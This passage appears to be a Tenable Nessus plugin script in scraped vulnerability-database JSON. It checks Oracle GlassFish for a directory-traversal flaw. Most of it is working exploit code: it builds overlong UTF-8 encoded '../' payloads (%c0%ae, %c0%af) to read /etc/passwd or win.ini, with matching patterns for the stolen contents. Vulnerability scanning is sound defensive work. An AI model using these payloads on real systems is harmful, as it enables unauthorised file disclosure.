script_set_attribute(attribute:\"see_also\",value:\"http://www.nessus.org/u?159578ad\");\n script_set_attribute(attribute:\"solution\", value:\n\"Contact to vendor for patch options.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:U/RC:X\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/30\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:glassfish_server\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"glassfish_console_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/glassfish\", \"www/glassfish/console\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"glassfish.inc\");\n\n##\n# Combine payload string for exploitation of issue\n#\n# @param [file:string] target file to read from server\n# @param [path:string] piece of URL that triggers vulnerable Java component\n# @param [payl:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed\n#\n# @return string payload to send to the server\n##\nfunction prepare_payload(file, path, payl, depth)\n{\n var i, piece, pieces_of_file;\n var url = '/theme/';\n\n if (empty_or_null(file) || empty_or_null(path) || \n empty_or_null(payl) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'prepare_payload');\n\n url += path;\n\n # Generate enough encoded /.. sequences \n for (i=0; i<depth; i++)\n url += payl['/'] + payl['.'] + payl['.'];\n\n # Encode / in file name\n pieces_of_file = split(file, sep:'/', keep:false);\n\n for (i=1; i<len(pieces_of_file); i++)\n url += payl['/'] + pieces_of_file[i];\n\n return url;\n}\n\n##\n# Select pieces from input parameters to generate payload\n#\n# @param [files:string] target file to read from server\n# @param [paths:string] piece of URL that triggers vulnerable Java component\n# @param [payloads:array] contains encoding pattern for '.' and '/'\n# @param [depth:int] depth of payloads needed \n#\n# @return list of urls that we have to test\n##\nfunction gather_pieces(files, paths, payloads, depth)\n{\n var file, path, payl;\n var urls_list = make_list();\n\n if (empty_or_null(files) || empty_or_null(paths) || \n empty_or_null(payloads) || empty_or_null(depth))\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n if (depth < 2)\n audit(AUDIT_FN_FAIL, 'gather_pieces');\n\n foreach file (files)\n foreach path (paths)\n foreach payl (payloads)\n urls_list[max_index(urls_list)] =\n prepare_payload(file:file, path:path, payl:payl, depth:depth);\n\n return urls_list;\n}\n\n#\n# Main\n#\n\n# Check GlassFish & GlassFish Admin Console\nget_kb_item_or_exit('www/glassfish');\nget_kb_item_or_exit('www/glassfish/console');\n\nvar port = get_glassfish_console_port(default:4848);\n\n# Parameters section\nvar depth = 10;\nvar files, paths, res, url;\nvar vuln, req, file;\nvar payloads = [{'.':'%c0%ae', '/':'%c0%af'},\n {'.':'%e0%80%ae', '/':'%c0%af'},\n {'.':'.', '/':'%e0%80%af'},\n {'.':'%f0%80%80%ae', '/':'%e0%80%af'}\n];\nvar file_pats = {\"/etc/passwd\":\"root:.*:0:[01]:\",\n \"/winnt/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\",\n \"/windows/win.ini\":\"^\\[[a-zA-Z\\s]+\\]|^; for 16-bit app support\"\n};\nvar os = get_kb_item('Host/OS');\n\n# Exploitation check\nif (!empty_or_null(os) && (report_paranoia < 2))\n{\n if (\"Windows\" >< os)\n {\n files = ['/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n }\n else\n {\n files = ['/etc/passwd'];\n paths = ['META-INF'];\n }\n}\nelse\n{\n files = ['/etc/passwd', '/windows/win.ini', '/winnt/win.ini'];\n paths = ['META-INF', 'com/sun', 'META-INF/test'];\n}\n\nforeach url (gather_pieces(files:files, paths:paths, payloads:payloads, depth:depth))\n{\n res = get_glassfish_res(url:url, port:port);\n\n foreach file (files)\n if (egrep(pattern:file_pats[file], string:res[2]))\n {\n security_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n extra : 'The following HTTP request was sent:\\n\\n' +\n build_glassfish_url(url:url, port:port) + '\\n\\n' +\n 'The contents of file obtained:\\n\\n' + chomp(res[2])\n );\n exit(0);\n }\n}\n\naudit(AUDIT_LISTEN_NOT_VULN, \"GlassFish Server\", port);\nexit(0);\n", "naslFamily": "CGI abuses", "cpe": ["cpe:/a:oracle:glassfish_server"], "solution": "Contact to vendor for patch options.", "nessusSeverity": "Medium", "cvssScoreSource": "", "vpr": {"risk factor": "Medium", "score": "4.4"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": null, "vulnerabilityPublicationDate": "2017-07-17T00:00:00", "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.base.Bulletin", "robots.models.nessus.NessusBulletin"]}]}

Glassfish Server Open Source Edition 3.1.2.2 Vulnerabilities

Source: https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/HTTP/GLASSFISH_TRAVERSAL